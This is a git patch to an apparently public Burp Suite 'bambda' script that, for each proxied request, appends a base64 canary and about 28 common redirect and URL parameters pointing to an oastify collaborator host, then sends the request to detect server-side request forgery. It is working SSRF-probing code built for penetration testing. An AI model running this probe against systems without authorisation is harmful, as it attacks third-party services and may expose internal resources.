From dd3c4f3d46f74e04f4e0ee7f4e43ba630ec2113f Mon Sep 17 00:00:00 2001 From: Eric Labrador Sainz <74373745+e1abrador@users.noreply.github.com> Date: Fri, 1 Dec 2023 15:03:51 +0100 Subject: [PATCH] working now -> ssrf_common_params.bambda --- Proxy/HTTP/ssrf_common_params.bambda | 69 +++++++++++++--------------- 1 file changed, 33 insertions(+), 36 deletions(-) diff --git a/Proxy/HTTP/ssrf_common_params.bambda b/Proxy/HTTP/ssrf_common_params.bambda index 094bca0..6b7f799 100644 --- a/Proxy/HTTP/ssrf_common_params.bambda +++ b/Proxy/HTTP/ssrf_common_params.bambda @@ -5,51 +5,48 @@ * * @author Eric Labrador Sainz (https://github.com/e1abrador) */ -public class RequestParameterTester { - public static void main(String[] args) { - String collaboratorUrl = "https://xyz.oastify.com/"; +String collaboratorUrl = "https://xyz.oastify.com/"; - try { - // Replace 'requestResponse.request().url()' with your URL - String originalUrl = "http://example.com"; // Placeholder for the original URL +try { + // Base64 encode the original request URL + String encodedUrl = java.util.Base64.getEncoder().encodeToString(requestResponse.request().url().getBytes()); - // Base64 encode the original URL - String encodedUrl = java.util.Base64.getEncoder().encodeToString(originalUrl.getBytes()); + // Construct the canary URL using the collaborator URL and the encoded original URL + String canary = collaboratorUrl + encodedUrl; - // Construct the canary URL - String canary = collaboratorUrl + encodedUrl; + // Start building the test URL with the original request URL + StringBuilder testURLBuilder = new StringBuilder(requestResponse.request().url()); - // Initialize the StringBuilder with the original URL - StringBuilder testURLBuilder = new StringBuilder(originalUrl); + // Add a '?' or '&' based on whether the original URL already contains query parameters + if (!testURLBuilder.toString().contains("?")) { + testURLBuilder.append("?"); + } else { + testURLBuilder.append("&"); + } - // Determine the initial query parameter delimiter - testURLBuilder.append(originalUrl.contains("?") ? "&" : "?"); + // Add the 'base64url' parameter with the canary + testURLBuilder.append("base64url=").append(canary); - // Append the 'base64url' parameter - testURLBuilder.append("base64url=").append(canary); + // Additional parameters to append + String[] paramsToAdd = {"dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data", + "reference", "site", "html", "val", "validate", "domain", "callback", "return", + "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", + "open"}; - // Parameters to be appended - String[] paramsToAdd = { - "dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data", - "reference", "site", "html", "val", "validate", "domain", "callback", "return", - "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", - "open" - }; + // Append the additional parameters with the collaboratorUrl as their value + for (String param : paramsToAdd) { + testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl); + } - // Append each parameter with the collaborator URL - for (String param : paramsToAdd) { - testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl); - } + // Convert the StringBuilder to a String and remove the trailing '&' + String testURL = testURLBuilder.toString().replaceAll("&$", ""); - // Convert to String and remove the trailing '&' - String testURL = testURLBuilder.toString().replaceAll("&$", ""); + // Send request + new java.net.URL(testURL).openStream(); - // Send the GET request - new java.net.URL(testURL).openStream(); - - } catch (Exception e) { - System.out.println("Error: " + e.getMessage()); - } - } +} catch (Exception e) { + System.out.println(e.getMessage()); } + +return false;